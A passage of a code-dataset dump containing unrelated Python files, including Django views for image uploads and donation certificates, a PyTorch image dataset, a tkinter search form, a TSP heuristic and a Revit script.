s1, s2, city, state, zip_]\n Table.__init__(self, 'addresses', cols)\n\nclass ContactTable(Table):\n def __init__(self):\n idcol = AutoId('contactid', 'contact_ident')\n name = PkName('name')\n address = Num('addressid')\n address.set_fk('addresses', 'addressid')\n email = PkBigname('email')\n desc = Text('description')\n Table.__init__(self, 'contacts', [idcol, name, address, email, desc])\n\nclass TicketTable(Table):\n def __init__(self):\n idcol = AutoId('ticketid', 'ticket_ident', pk=True)\n title = Name('title')\n title.constraint.null = False\n author = Name('author')\n created = Now('created')\n data = Text('data')\n cols = [idcol, title, author, created, data]\n Table.__init__(self, 'tickets', cols)\n \nclass TicketActionTable(Table):\n def __init__(self):\n ticket = Num('ticketid')\n ticket.set_fk('tickets')\n actionid = AutoId('actionid', 'action_ident', pk=True)\n subject = Bigname('subject')\n action = Name('action')\n author = Name('author')\n posted = Now('posted')\n data = Text('data')\n cols = [ticket, actionid, subject, action, author, posted, data]\n Table.__init__(self, 'ticketactions', cols)\n \nclass TicketActionParentTable(Table):\n def __init__(self):\n actionid = PkNum('actionid')\n actionid.set_fk('ticketactions', 'actionid')\n parent = PkNum('parent')\n parent.set_fk('ticketactions')\n Table.__init__(self, 'ticketactionparent', [actionid, parent])\n \nclass TicketStatusTable(Table):\n def __init__(self):\n ticketid = PkNum('ticketid')\n ticketid.set_fk('tickets')\n status = Name('status')\n Table.__init__(self, 'ticketstatus', [ticketid, status])\n\nclass LocationTable(Table):\n def __init__(self):\n idcol = AutoId('locationid', 'location_ident')\n name = PkName('name')\n name.constraint.default = 'main office'\n addressid = PkNum('addressid')\n addressid.set_fk('addresses', 'addressid')\n isp = PkName('isp')\n conn = PkName('connection')\n ip = PkName('ip')\n static = Bool('static')\n static.constraint.pk = True\n serviced = Bool('serviced')\n serviced.constraint.pk = True\n cols = [idcol, name, addressid, isp, conn, ip, static, serviced]\n Table.__init__(self, 'locations', cols)\n \nclass ClientTable(Table):\n def __init__(self):\n idcol = PkNum('clientid')\n idcol.set_auto_increment('client_ident')\n client = Name('client')\n client.constraint.unique = True\n Table.__init__(self, 'clients', [idcol, client])\n \nclass ClientTicketTable(Table):\n def __init__(self):\n clientid = PkNum('clientid')\n clientid.set_fk('clients')\n ticketid = PkNum('ticketid')\n ticketid.set_fk('tickets')\n status = Name('status')\n Table.__init__(self, 'client_tickets', [clientid, ticketid, status])\n \nclass ClientInfoTable(Table):\n def __init__(self):\n clientid = Num('clientid')\n clientid.set_fk('clients')\n locationid = Num('locationid')\n locationid.set_fk('locations', 'locationid')\n contactid = Num('contactid')\n contactid.set_fk('contacts', 'contactid')\n cols = [clientid, locationid, contactid]\n Table.__init__(self, 'clientinfo', cols)\n \nclass ClientDataTable(Table):\n def __init__(self):\n clientid = PkNum('clientid')\n clientid.set_fk('clients')\n name = PkName('name')\n value = Text('value')\n cols = [clientid, name, value]\n Table.__init__(self, 'clientdata', cols)\n\nclass TaskTable(Table):\n def __init__(self):\n taskid = PkNum('taskid')\n taskid.set_auto_increment('task_ident')\n name = Name('name')\n desc = Text('description')\n cols = [taskid, name, desc]\n Table.__init__(self, 'tasks', cols)\n\nclass ClientTaskTable(Table):\n def __init__(self):\n taskid = 
PkNum('taskid')\n taskid.set_fk('tasks')\n clientid = PkNum('clientid')\n clientid.set_fk('clients')\n Table.__init__(self, 'clienttask', [taskid, clientid])\n\nclass LocationTaskTable(Table):\n def __init__(self):\n taskid = PkNum('taskid')\n taskid.set_fk('tasks')\n locationid = PkNum('locationid')\n locationid.set_fk('locations', 'locationid')\n Table.__init__(self, 'locationtask', [taskid, locationid])\n \n \nMAINTABLES = [AddressTable, ContactTable, TicketTable,\n TicketStatusTable, TicketActionTable, TicketActionParentTable,\n LocationTable, ClientTable, ClientTicketTable, ClientInfoTable,\n ClientDataTable, TaskTable, ClientTaskTable, LocationTaskTable\n ]\n\ndef create_schema(cursor, group):\n newseqs = [s for s in sequences if s not in cursor.sequences()]\n for s in newseqs:\n cursor.create_sequence(Sequence(s))\n for t in MAINTABLES:\n cursor.create_table(t())\n\n tables = [t().name for t in MAINTABLES]\n full = [ClientInfoTable, ClientTicketTable, ClientTaskTable, LocationTaskTable]\n insup = [AddressTable, ContactTable, TicketStatusTable,\n LocationTable, ClientTable, TaskTable]\n ins = [TicketTable, TicketActionTable, TicketActionParentTable]\n\n execute = cursor.execute\n execute(grant_public(tables))\n execute(grant_group('ALL', sequences, group))\n execute(grant_group('ALL', [t().name for t in full], group))\n execute(grant_group('INSERT', [t().name for t in ins + insup], group))\n execute(grant_group('UPDATE', [t().name for t in insup], group))\n \n \n","sub_path":"useless/kdedb/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":7365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"536638234","text":"from PubgGame import PubgGame\nfrom HalfGoGame import HalfGoGame\nfrom backup.MinMaxSearch import MinMaxSearch\nfrom backup.ABsearch import Absearch\nfrom backup.HumanSearch import HumanSearch\n\nWHITE = 1\nBLACK = -1\nclass Player(object):\n def __init__(self, color):\n # two games\n self.pubg = PubgGame(8)\n self.halfGo = HalfGoGame(8)\n # # self.pubgPredictModule = PredictModule(\"pubgParams\")\n # # self.halfGoPredictModule = PredictModule(\"halfGoParams\")\n #\n # # common thing\n self.game = self.halfGo\n self.myColor = WHITE if color == \"white\" else BLACK\n self.turn = -1\n self.board = self.game.getInitBoard() # Objective board\n # # self.predictModule = self.halfGoPredictModule\n self.searchModule = HumanSearch(self.game, self.myColor)\n self.pubgMode = False\n\n\n\n def action(self, turns):\n \"\"\"\n Call by referee\n ti request an action\n :param turns:\n :return:\n \"\"\"\n # recalibrate the turns\n self.turn = turns\n # print(turns, self.turn)\n\n # Use our own coordinate for search, and update board\n action = self.search(self.board, turns, self.myColor)\n\n if self.myColor == BLACK and not self.pubgMode:\n action = 63 - action\n valids = self.game.getValidMoves(self.board,self.myColor)\n while(True):\n action = 0 if action == (len(valids)-1) else action\n if not valids[action]:\n action+=1\n else:\n break\n self.board, next_player = self.game.getNextState(self.board, self.myColor, action, self.turn)\n # self.game coordinate -> referee\n action_referee_form = self.game.actionGameToReferee(action)\n\n if self.turn == 23 and not self.pubgMode:\n self.game = self.pubg\n self.turn = 0\n # self.predictModule = self.pubgPredictModule\n self.searchModule = MinMaxSearch(self.game, self.myColor)\n self.pubgMode = True\n # a = input()\n return action_referee_form\n\n\n def update(self, 
action):\n \"\"\"\n :param action:\n Placing(x,y);\n Moving((a,b), (c,d));\n No action: None\n :return: void\n \"\"\"\n self.turn += 1\n \n action_our_form = self.game.actionRefereeToGame(action)\n\n self.board, next_player = self.game.getNextState(self.board, -1*self.myColor, action_our_form, self.turn)\n\n if self.turn == 23 and not self.pubgMode:\n self.game = self.pubg\n self.turn = 0\n # self.predictModule = self.pubgPredictModule\n self.searchModule = Absearch(self.game, self.myColor)\n self.pubgMode = True\n \n def search(self, board, turn, colour):\n return self.searchModule.search(board, turn, colour)\n \n \n","sub_path":"backup/ABplayer.py","file_name":"ABplayer.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"435220832","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nimport random\nimport json\nimport requests\n\n# Create your views here.\ndef ai(request):\n with open(\"./json1.txt\", \"r\") as f:\n json1 = json.load(f)\n f.close()\n image_file = \"./static/\" + str(random.random() * 10) + \".jpg\"\n image_i = image_file[1:]\n if request.method == \"GET\":\n return render(request, 'index.html')\n else:\n image = request.FILES.get(\"photo\")\n if not image:\n imageUrl = request.POST.get('photoURL')\n # print(imageUrl)\n response = requests.get(imageUrl)\n image = response.content\n with open(image_file, \"wb\") as f:\n f.write(image)\n f.close()\n else:\n with open(image_file, \"wb\") as f:\n f.write(image.read())\n f.close()\n print(image_i)\n return render(request, \"index.html\", context={\"i\": image_i, \"t\": json1})\n","sub_path":"django/FaceofPeople1/ai/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"132994521","text":"import os\nimport h5py\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision.transforms import Normalize, Compose, ToTensor\nimport random\nfrom models import VGG_16\n\nclass Breast_Dataset(Dataset):\n def __init__(self, resolution=(128, 128), downsample=True):\n self.downsample = downsample\n self.resolution = resolution\n with open(\"./data.csv\", 'r') as f:\n self.filenames = [line.split()[0].split(',')[0] for line in f]\n with open(\"./data.csv\", 'r') as f:\n self.labels = [line.split()[0].split(',')[1] for line in f]\n self.transform_image = Compose([\n ToTensor(),\n Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n self.transform = Compose([\n ToTensor(),\n ])\n \n def __len__(self):\n return len(self.filenames)\n \n def __getitem__(self, idx):\n filename = self.filenames[idx]\n label = self.labels[idx]\n with h5py.File(\"../\" + filename, 'r') as f:\n data = f['data'][()]\n img = data[:, :, 0]\n scaled_img = rescale_img_np(img, tmax=255.0, tmin=0.0)\n PIL_image = Image.fromarray(np.uint8(scaled_img)).convert('RGB')\n \n if self.downsample:\n image = PIL_image.resize(self.resolution) \n \n image = np.asarray(image, dtype=np.uint8) \n image = self.transform(image.copy())\n if label == 'MALIGNANT':\n label = float(1.0)\n else:\n label = float(0.0)\n \n sample = {'image': image, 'label': label}\n \n return sample\n \ndef rescale_img_np(x, mode='scale', tmax=1.0, tmin=0.0):\n if (mode == 'scale'):\n \n xmax = np.max(x)\n xmin = np.min(x)\n \n if xmin == xmax:\n return 
0.5 * np.ones_like(x) * (tmax - tmin) + tmin\n x = ((x - xmin) / (xmax - xmin)) * (tmax - tmin) + tmin\n elif (mode == 'clamp'):\n x = np.clamp(x, 0, 1)\n return x\n\ndef rescale_img(x, mode='scale', tmax=1.0, tmin=0.0):\n if (mode == 'scale'):\n \n xmax = torch.max(x)\n xmin = torch.min(x)\n \n if xmin == xmax:\n return 0.5 * np.ones_like(x) * (tmax - tmin) + tmin\n x = ((x - xmin) / (xmax - xmin)) * (tmax - tmin) + tmin\n elif (mode == 'clamp'):\n x = torch.clamp(x, 0, 1)\n return x\n\nif __name__ == '__main__':\n # filename = '../data/00001/LEFT_MLO.h5'\n # with h5py.File(filename, 'r') as f:\n # data = f['data'][()]\n # img = data[:, :, 0]\n # scaled_img = rescale_img(img, tmax=255.0, tmin=0.0)\n # PIL_image = Image.fromarray(np.uint8(scaled_img)).convert('RGB')\n seed = 40\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n \n breast_dataset = Breast_Dataset()\n breast_dataset[0]\n train_dataset, val_dataset, test_dataset = torch.utils.data.random_split(breast_dataset,\n [450, 65, 130])\n train_data_loader = DataLoader(train_dataset, batch_size=64, shuffle=True)\n val_data_loader = DataLoader(val_dataset, batch_size=1, shuffle=False)\n test_data_loader = DataLoader(test_dataset, batch_size=1, shuffle=False)\n \n for i, batch in enumerate(train_data_loader):\n print(i)\n print(batch['image'].shape) # 64, 3, 128, 128\n print(batch['label'].shape) # 64, 1\n \n image_rescaled = rescale_img(batch['image'][0])\n image_rescaled = image_rescaled.numpy().transpose(1,2,0)\n plt.imshow(image_rescaled)\n \n image = batch['image']\n model = VGG_16() \n out = model(image)\n print(out.shape) \n pass\n \n \n ","sub_path":"dataio.py","file_name":"dataio.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"103114958","text":"from tkinter import *\nfrom gui.prikaz_entiteta.prikaz_prostorija import PrikazProstorija\nfrom model.dto.prenos_prostorija_dto import PretragaProstorijaDTO\nfrom tkinter.ttk import Combobox\nfrom tkinter import messagebox\nfrom model.konstante.konstante import REGEX_VREME, REGEX_DATUM\nfrom servis.prostorije.zauzeca_prostorija_servis import ZauzecaProstorijaServis\nfrom servis.oprema.oprema_servis import OpremaServis\n\n\nclass PretragaProstorija:\n\n def __init__(self, root):\n self._root = root\n self.lista_zahtevane_opreme = []\n self.napravi_frejmove()\n\n self.grupisi_vreme_od()\n self.grupisi_vreme_do()\n self.postava()\n\n def napravi_frejmove(self):\n self.frejm_za_vremena = Frame(self._root)\n self.frejm_za_vremena.place(x=0, y=0, width=450, height=250)\n\n self.drugi_frejm = Frame(self._root)\n self.drugi_frejm.place(x=0, y=250, width=200, height=500)\n\n self.treci_frejm = Frame(self._root)\n self.treci_frejm.place(x=200, y=250, width=200, height=500)\n\n self.cetvrti_frejm = Frame(self._root)\n self.cetvrti_frejm.place(x=100, y=500, width=200, height=500)\n\n def postava(self):\n v = OpremaServis().vrati_svu_opremu_u_sistemu()\n self.combo = Combobox(self.drugi_frejm, state='readonly', values=v, width=14)\n self.combo.grid(row=2, column=2, padx=20, pady=20)\n\n dugme = Button(self.drugi_frejm, text=\"DODAJ OPREMU\", command=self.print_vrednost_comba)\n dugme.grid(row=1, column=2, padx=20, pady=20)\n\n self.label = Label(self.treci_frejm, text=\"Izabrana oprema \\n za pretragu\").grid(row=0, column=0, padx=20)\n self.prikaz = Listbox(self.treci_frejm)\n\n dugme = Button(self.cetvrti_frejm, text=\"PRETRAZI\", 
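# \"PRETRAZI\" (\"search\") button, wired to the pretraga handler below\n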
command=self.pretraga)\n dugme.grid(row=0, column=2, padx=20, pady=20)\n\n def grupisi_vreme_od(self):\n self.grupa1 = LabelFrame(self.frejm_za_vremena, text=\"Vreme od\", padx=10, pady=20)\n self.grupa1.grid(row=2, column=1)\n\n Label(self.grupa1, text=\"Datum\").grid(row=0, column=1)\n Label(self.grupa1, text=\"Vreme\").grid(row=0, column=2)\n self.datumOd = Entry(self.grupa1)\n self.datumOd.grid(row=1, column=1, padx=20)\n self.vremeOd = Entry(self.grupa1)\n self.vremeOd.grid(row=1, column=2, padx=20)\n\n def grupisi_vreme_do(self):\n self.grupa2 = LabelFrame(self.frejm_za_vremena, text=\"Vreme do\", padx=10, pady=20)\n self.grupa2.grid(row=3, column=1)\n\n Label(self.grupa2, text=\"Datum\").grid(row=0, column=1)\n Label(self.grupa2, text=\"Vreme\").grid(row=0, column=2)\n self.datumDo = Entry(self.grupa2)\n self.datumDo.grid(row=1, column=1, padx=20)\n self.vremeDo = Entry(self.grupa2)\n self.vremeDo.grid(row=1, column=2, padx=20)\n\n def provera_unosa_vremena(self):\n if not REGEX_VREME.match(self.vremeOd.get()):\n messagebox.showerror(\"GRESKA\", \"Neispravan unos vremena.Oblik unos treba biti ss:mm\")\n return False\n if not REGEX_VREME.match(self.vremeDo.get()):\n messagebox.showerror(\"GRESKA\", \"Neispravan unos vremena.Oblik unos treba biti ss:mm\")\n return False\n if not REGEX_DATUM.match(self.datumOd.get()):\n messagebox.showerror(\"GRESKA\", \"Neispravan unos datuma.Oblik unosa treba biti dd/mm/gggg\")\n return False\n if not REGEX_DATUM.match(self.datumDo.get()):\n messagebox.showerror(\"GRESKA\", \"Neispravan unos datuma.Obrlk unosa treba biti dd/mm/gggg\")\n return False\n return True\n\n def pretraga(self):\n if self.provera_unosa_vremena():\n paket_za_prenos = PretragaProstorijaDTO(self.lista_zahtevane_opreme, self.datumOd.get(), self.vremeOd.get(),\n self.datumDo.get(), self.vremeDo.get(), True)\n lista = ZauzecaProstorijaServis().zauzece_prostorije_od_do(paket_za_prenos)\n novi_root = Tk()\n PrikazProstorija(novi_root, lista)\n\n def print_vrednost_comba(self):\n vrednost = self.combo.get()\n\n if vrednost == \"\":\n messagebox.showinfo(\"Prazno\", \"Izaberite opremu.\")\n else:\n if vrednost not in self.lista_zahtevane_opreme:\n self.lista_zahtevane_opreme.append(vrednost)\n self.prikaz.insert(1, vrednost)\n self.prikaz.grid(row=1, column=0, padx=2)\n else:\n messagebox.showinfo(\"Unos\", \"Parametar koji ste uneli vec je dodat u listu zahtevanih\")\n\n\ndef poziv_forma_za_pretragu_prostorija(root):\n a = PretragaProstorija(root)\n root.mainloop()\n\n\nif __name__ == '__main__':\n root = Tk()\n root.geometry(\"600x570\")\n poziv_forma_za_pretragu_prostorija(root)\n","sub_path":"gui/upravnik/pretraga_prostorija.py","file_name":"pretraga_prostorija.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"81888436","text":"import sys, collections\nsys.setrecursionlimit(10**6)\n\ndef make_graph(n, p):\n g = collections.defaultdict(int)\n for i in range(1, n+1):\n g[i] = p[i-1]\n return g \n\ndef dfs(u):\n global g\n global visited\n\n visited[u] = 1\n\n if not visited[g[u]]:\n dfs(g[u])\n\nt = int(sys.stdin.readline().strip())\n\nfor _ in range(t):\n n = int(sys.stdin.readline().strip())\n p = [int(x) for x in sys.stdin.readline().split()]\n cnt = 0\n\n g = make_graph(n, p)\n visited = [0 for _ in range(n+1)]\n\n for i in range(1, n+1):\n if not visited[i]:\n dfs(i)\n cnt += 1\n \n print(cnt)\n","sub_path":"Baekjoon/Graph/BFS&DFS/10451(순열 사이클).py","file_name":"10451(순열 
사이클).py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"145563234","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom .models import *\nfrom .forms import *\nfrom django.core.exceptions import ObjectDoesNotExist\n\nimport datetime\n\nfrom django.views.generic import View\nfrom django.template.loader import get_template\nfrom Social_Vision_Web.utils import render_to_pdf\n\nimport os\nfrom django.conf import settings\nfrom xhtml2pdf import pisa\nfrom django.contrib.staticfiles import finders\n\nfrom .decorators import *\nfrom django.contrib.auth.models import Group\n\ndef link_callback(uri, rel):\n result = finders.find(uri)\n if result:\n if not isinstance(result, (list, tuple)):\n result = [result]\n result = list(os.path.realpath(path) for path in result)\n path = result[0]\n else:\n sUrl = settings.STATIC_URL # Typically /static/\n sRoot = settings.STATIC_ROOT # Typically /home/userX/project_static/\n mUrl = settings.MEDIA_URL # Typically /media/\n mRoot = settings.MEDIA_ROOT # Typically /home/userX/project_static/media/\n\n if uri.startswith(mUrl):\n path = os.path.join(mRoot, uri.replace(mUrl, \"\"))\n elif uri.startswith(sUrl):\n path = os.path.join(sRoot, uri.replace(sUrl, \"\"))\n else:\n return uri\n\n # make sure that file exists\n if not os.path.isfile(path):\n raise Exception(\n 'media URI must start with %s or %s' % (sUrl, mUrl)\n )\n return path\n\n\n@authenticated_user\ndef donateView(request):\n user = request.user\n try:\n donations = user.donation_set.all()\n context = {\n 'user':user,\n 'donations':donations,\n }\n except ObjectDoesNotExist as o:\n context = {\n 'user':user,\n }\n\n\n return render(request, 'changemaker/donateUser.html', context)\n\n\n@authenticated_user\ndef donateForm(request):\n user = request.user\n form = DonationForm(initial={'user': request.user})\n\n if request.method == 'POST':\n form = DonationForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n uniqueID = Donation.objects.latest('dateCreated').uniqueID\n return redirect('/change-maker/pay/' + str(uniqueID) + '/')\n\n context = {\n 'form': form,\n }\n\n return render(request, 'changemaker/donateForm.html', context)\n\n@authenticated_user\ndef donatePay(request, id):\n donation = Donation.objects.get(uniqueID=id).amount\n uniqueID = Donation.objects.get(uniqueID=id).uniqueID\n\n context = {\n 'donation':donation,\n 'id':uniqueID,\n }\n\n return render(request, 'changemaker/donatePay.html',context)\n\n@authenticated_user\ndef donateSuccess(request, id):\n donation = Donation.objects.get(uniqueID=id)\n donation.status = \"Completed\"\n donation.save()\n context = {\n\n }\n\n return redirect('/change-maker/view/')\n\n@authenticated_user\ndef printDonationCertif(request, id):\n user = request.user\n dn = Donation.objects.get(uniqueID=id)\n\n context = {\n 'dn': dn,\n 'user':user,\n }\n\n # return render(request, 'changemaker/donateCertif.html', context)\n\n template_path = 'changemaker/donateCertif.html'\n response = HttpResponse(content_type='application/pdf')\n response['Content-Disposition'] = 'filename=\"Donation-Certificate.pdf'\n template = get_template(template_path)\n html = template.render(context)\n pisa_status = pisa.CreatePDF(\n html, dest=response, link_callback=link_callback)\n if pisa_status.err:\n return HttpResponse('We had some errors
<pre>' + html + '</pre>
')\n return response\n\n@authenticated_user\ndef printDonationReceipt(request, id):\n user = request.user\n dn = Donation.objects.get(uniqueID=id)\n\n context = {\n 'dn': dn,\n 'user':user,\n }\n\n template_path = 'changemaker/donateReceipt.html'\n response = HttpResponse(content_type='application/pdf')\n response['Content-Disposition'] = 'filename=\"Donation-Receipt.pdf'\n template = get_template(template_path)\n html = template.render(context)\n pisa_status = pisa.CreatePDF(\n html, dest=response, link_callback=link_callback)\n if pisa_status.err:\n return HttpResponse('We had some errors
<pre>' + html + '</pre>
')\n return response\n","sub_path":"changemaker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"500858416","text":"#ashwin\nn,q=map(int,input().split())\nprint(\"Prime numbers between\",n,\"and\",q,\"are:\")\nfor num in range(n,q + 1):\n if num > 1:\n for i in range(2,num):\n if (num % i) == 0:\n break\n else:\n print(num)\n","sub_path":"prime_range.py","file_name":"prime_range.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"232658869","text":"import csv\nimport os\nfrom outputBuilder import OutputBuilder\n\n\ndef main():\n output = OutputBuilder()\n cur_path = os.path.dirname(__file__)\n input_path = os.path.relpath(\"../inputs/input.csv\", cur_path)\n\n try:\n # Assuming \"input.csv\" is simulating a real-time buffer\n stream = open(input_path, \"r\", newline=\"\") \n ireader = csv.reader(stream)\n while True:\n try:\n line = next(ireader)\n output.process_line(line)\n except StopIteration:\n print(\"task completed\")\n break\n except:\n print(\"input file error\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559631004","text":"from pyretic.lib.corelib import *\nfrom pyretic.lib.std import *\nfrom pyretic.lib.query import *\n\nclass VlanFilter(DynamicPolicy):\n def __init__(self, vlans, ports):\n super(VlanFilter, self).__init__()\n self.vlans = vlans\n self.ports = ports\n self.update_filter()\n\n def update_filter(self):\n self.filter_policy = drop\n for key in self.ports.keys():\n switch = int(key.split('-')[0])\n port = int(key.split('-')[1])\n vid = self.ports[key]\n self.filter_policy = self.filter_policy + match(switch=switch, outport=port, vlan_id=vid)\n self.policy = if_(egress_network(), self.filter_policy >> modify(vlan_id=None), identity)\n","sub_path":"controller/app/vlan_filter.py","file_name":"vlan_filter.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"209041445","text":"# William McLaughlin\r\n# Evan LeValley\r\n\r\n\r\nclass Graph:\r\n\r\n def __init__(self, vertices):\r\n self.V = vertices\r\n self.graph = []\r\n\r\n def addEdge(self, u, v, w):\r\n self.graph.append([u, v, w])\r\n\r\n def find(self, parent, i):\r\n if parent[i] == i:\r\n return i\r\n return self.find(parent, parent[i])\r\n\r\n def union(self, parent, rank, x, y):\r\n xroot = self.find(parent, x)\r\n yroot = self.find(parent, y)\r\n\r\n if rank[xroot] < rank[yroot]:\r\n parent[xroot] = yroot\r\n elif rank[xroot] > rank[yroot]:\r\n parent[yroot] = xroot\r\n\r\n else:\r\n parent[yroot] = xroot\r\n rank[xroot] += 1\r\n\r\n def KruskalMST(self):\r\n result = []\r\n i = 0\r\n e = 0\r\n\r\n self.graph = sorted(self.graph, key=lambda item: item[2])\r\n\r\n parent = []\r\n rank = []\r\n\r\n for node in range(self.V):\r\n parent.append(node)\r\n rank.append(0)\r\n\r\n while e < self.V - 1:\r\n\r\n u, v, w = self.graph[i]\r\n i = i + 1\r\n x = self.find(parent, u)\r\n y = self.find(parent, v)\r\n\r\n if x != y:\r\n e = e + 1\r\n result.append([u, v, w])\r\n self.union(parent, rank, x, y)\r\n\r\n edge = []\r\n for u, v, weight in result:\r\n\r\n newList = [u, v,weight]\r\n edge.append(newList)\r\n 
newList = [v, u, weight]\r\n edge.append(newList)\r\n\r\n return find_eulerian_tour(edge)\r\n\r\n\r\ndef next_node(edge, current):\r\n return edge[0] if current == edge[1] else edge[1]\r\n\r\n\r\ndef remove_edge(raw_list, discard):\r\n return [item for item in raw_list if item != discard]\r\n\r\n\r\ndef find_eulerian_tour(graph):\r\n search = [[[], graph[0][0], graph]]\r\n while search:\r\n path, node, unexplore = search.pop()\r\n path += [node]\r\n\r\n if not unexplore:\r\n return path\r\n\r\n for edge in unexplore:\r\n if node in edge:\r\n search += [[path, next_node(edge, node), remove_edge(unexplore, edge)]]\r\n\r\n\r\ndef trimPath(eucPath):\r\n unique = []\r\n\r\n for i in eucPath:\r\n if i not in unique:\r\n unique.append(i)\r\n\r\n unique.append(unique[0])\r\n return unique\r\n\r\n\r\ndef getWeight(eucPath, matrix):\r\n sum = 0\r\n for i in range(len(eucPath)-2):\r\n j = eucPath[i]\r\n k = eucPath[i+1]\r\n sum += matrix[j][k]\r\n return sum\r\n\r\n\r\ndef main():\r\n matrix = [[]]\r\n count = 0\r\n\r\n with open('in.txt', 'r') as f:\r\n for line in f:\r\n matrix.append([])\r\n for word in line.split():\r\n string = word.strip()\r\n integer = int(string, 10)\r\n matrix[count].append(integer)\r\n count += 1\r\n\r\n g = Graph(len(matrix)-1)\r\n for i in range(len(matrix)-1):\r\n for j in range(len(matrix)-1):\r\n g.addEdge(i, j, matrix[i][j])\r\n\r\n\r\n eucPath = g.KruskalMST()\r\n eucPath = trimPath(eucPath)\r\n weight = getWeight(eucPath, matrix)\r\n print(\"sum: \", weight)\r\n\r\n for u in eucPath:\r\n # if u == 0:\r\n # u = 'Aa'\r\n # if u == 1:\r\n # u = 'Ba'\r\n # if u == 2:\r\n # u = 'Be'\r\n # if u == 3:\r\n # u = 'Du'\r\n # if u == 4:\r\n # u = 'Fr'\r\n # if u == 5:\r\n # u = 'Ha'\r\n # if u == 6:\r\n # u = 'Mu'\r\n # if u == 7:\r\n # u = 'Nu'\r\n # if u == 8:\r\n # u = 'St'\r\n print(u, end=' -- ')\r\n\r\n\r\nmain()\r\n","sub_path":"TSP.py","file_name":"TSP.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"269385199","text":"\"\"\"\nCopyright (c) 2014-2016 Ehsan Iran-Nejad\nPython scripts for Autodesk Revit\n\nThis file is part of pyRevit repository at https://github.com/eirannejad/pyRevit\n\npyRevit is a free set of scripts for Autodesk Revit: you can redistribute it and/or modify\nit under the terms of the GNU General Public License version 3, as published by\nthe Free Software Foundation.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\nGNU General Public License for more details.\n\nSee this link for a copy of the GNU General Public License protecting this package.\nhttps://github.com/eirannejad/pyRevit/blob/master/LICENSE\n\"\"\"\n\n__doc__ = 'Merges the selected text note elements into one.'\n\n__window__.Close()\nfrom Autodesk.Revit.DB import Transaction\n\ndoc = __revit__.ActiveUIDocument.Document\nuidoc = __revit__.ActiveUIDocument\n\nt = Transaction(doc, 'Merge Single-Line Text')\nt.Start()\n\nselection = [doc.GetElement(elId) for elId in __revit__.ActiveUIDocument.Selection.GetElementIds()]\ntnotes = sorted(selection, key=lambda txnote: 0 - txnote.Coord.Y)\n\nmtxt = tnotes[0]\nmtxtwidth = mtxt.Width\nfor txt in tnotes[1:]:\n if txt.Text[0] == ' ':\n mtxt.Text = mtxt.Text + txt.Text\n else:\n mtxt.Text = mtxt.Text + ' ' + txt.Text\n doc.Delete(txt.Id)\n\nmtxt.Width = mtxtwidth\nt.Commit()\n","sub_path":"Text_mergeTextNotes.py","file_name":"Text_mergeTextNotes.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"328111104","text":"from copy import deepcopy\nimport re\nimport sys\nfrom django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.conf import settings\nfrom django.db.models import Q\nfrom django.http import JsonResponse, HttpResponseNotFound\nfrom django.conf import settings\nfrom django.db import connection\nfrom django.core.urlresolvers import reverse\nfrom data_upload.models import UserUpload, UserUploadedFile\nfrom projects.models import User_Feature_Definitions, User_Feature_Counts, Project\nfrom sharing.service import create_share\nfrom google.appengine.api.mail import send_mail\n\nimport json\nimport requests\n\n@login_required\ndef public_project_list(request):\n return project_list(request, is_public=True)\n\n@login_required\ndef project_list(request, is_public=False):\n template = 'projects/project_list.html'\n\n ownedProjects = request.user.project_set.all().filter(active=True)\n sharedProjects = Project.objects.filter(shared__matched_user=request.user, shared__active=True, active=True)\n\n projects = ownedProjects | sharedProjects\n projects = projects.distinct()\n\n context = {\n 'projects': projects,\n 'public_projects': Project.objects.all().filter(is_public=True,active=True),\n 'is_public': is_public\n }\n return render(request, template, context)\n\n@login_required\ndef project_detail(request, project_id=0):\n # \"\"\" if debug: print >> sys.stderr,'Called '+sys._getframe().f_code.co_name \"\"\"\n template = 'projects/project_detail.html'\n\n ownedProjects = request.user.project_set.all().filter(active=True)\n sharedProjects = Project.objects.filter(shared__matched_user=request.user, shared__active=True, active=True)\n publicProjects = Project.objects.all().filter(is_public=True,active=True)\n\n projects = ownedProjects | 